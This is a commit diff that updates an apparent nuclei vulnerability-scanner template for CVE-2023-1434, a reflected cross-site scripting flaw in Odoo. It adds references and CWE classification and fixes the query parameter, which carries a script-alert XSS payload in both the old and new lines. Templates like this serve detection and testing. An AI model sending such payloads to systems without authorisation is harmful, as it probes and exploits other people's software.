Merge pull request #7320 from ruben-condor/add-reference-and-classification-and-fix-param

Updated CVE-2023-1434
patch-10
Dhiyaneshwaran 2023-06-05 15:37:05 +05:30 committed by GitHub
commit e1f9a21da7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 1 deletions

View File

@ -6,6 +6,10 @@ info:
severity: medium
reference:
- https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434
classification:
cve-id: CVE-2023-1434
cwe-id: CWE-79
metadata:
max-request: 1
verified: true
@ -15,7 +19,7 @@ info:
http:
- method: GET
path:
- "{{BaseURL}}/web/set_profiling?profile=0&collector=<script>alert(document.domain)</script>"
- "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"
matchers-condition: and
matchers: